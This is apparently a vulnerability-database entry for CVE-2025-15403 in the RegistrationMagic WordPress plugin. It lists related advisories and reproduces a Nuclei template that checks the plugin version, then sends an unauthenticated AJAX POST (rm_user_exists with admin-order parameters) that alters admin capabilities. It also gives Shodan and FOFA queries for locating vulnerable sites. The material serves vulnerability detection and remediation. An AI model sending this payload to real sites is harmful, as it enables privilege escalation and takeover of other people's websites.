RegistrationMagic <= 6.0.7.1 - Privilege Escalation
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Mephisto | 21 May 202605:06 | – | githubexploit | |
| Exploit for CVE-2025-15403 | 18 Apr 202619:47 | – | githubexploit | |
| CVE-2025-15403 | 17 Jan 202602:22 | – | attackerkb | |
| CVE-2025-15403 | 17 Jan 202604:01 | – | circl | |
| WordPress Plugin RegistrationMagic has a security vulnerability | 17 Jan 202600:00 | – | cnnvd | |
| CVE-2025-15403 | 17 Jan 202602:22 | – | cve | |
| CVE-2025-15403 RegistrationMagic <= 6.0.7.1 - Unauthenticated Privilege Escalation via admin_order | 17 Jan 202602:22 | – | cvelist | |
| EUVD-2026-3164 | 17 Jan 202602:22 | – | euvd | |
| CVE-2025-15403 | 17 Jan 202603:16 | – | nvd | |
| WordPress RegistrationMagic plugin <= 6.0.7.1 - Privilege Escalation via admin_order vulnerability | 19 Jan 202606:44 | – | patchstack |
10
id: CVE-2025-15403
info:
name: RegistrationMagic <= 6.0.7.1 - Privilege Escalation
author: 0x_Akoko,pdresearch
severity: critical
description: |
RegistrationMagic WordPress plugin <= 6.0.7.1 contains a privilege escalation caused by improper access control in 'add_menu' via 'rm_user_exists' AJAX action, letting unauthenticated attackers manipulate admin menu capabilities, exploit requires subscriber user for further escalation.
impact: |
Unauthenticated attackers can escalate privileges to gain admin capabilities, potentially compromising the entire WordPress site.
remediation: |
Update to the latest version beyond 6.0.7.1.
reference:
- https://github.com/Nxploited/CVE-2025-15403
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/registrationmagic/
- https://nvd.nist.gov/vuln/detail/CVE-2025-15403
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-15403
cwe-id: CWE-269
metadata:
verified: true
max-request: 2
vendor: metagauss
product: registrationmagic
framework: wordpress
fofa-query: body="/wp-content/plugins/custom-registration-form-builder-with-submission-manager/"
shodan-query: http.html:"/wp-content/plugins/custom-registration-form-builder-with-submission-manager/"
tags: cve,cve2025,wordpress,wp,wp,wp-plugin,registrationmagic,privilege-escalation,intrusive
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "registrationmagic")'
- 'compare_versions(ver, "<= 6.0.7.1")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: regex
name: ver
part: body
group: 1
regex:
- '(?i)Stable tag:\s*([\d.]+)'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=rm_user_exists&rm_slug=rm_options_admin_menu&order=%2Cmenu1&_Subscriber=1&restore=false&enable_admin_order=yes
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- '!contains(body, "-1")'
- 'len(body) <= 5'
condition: and
# digest: 4a0a00473045022100a86f09783402b66a3dc0b245fe6e613162c2353fbf2c78e69e16abb871004a3f022064bbf84887fa147a0073e8ae46ea05e1f07efe62a3d11df72946a5dc534478a7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Aug 2026 00:08Current
5.1Medium risk
Vulners AI Score5.1
CVSS 3.19.8
EPSS0.00469
SSVC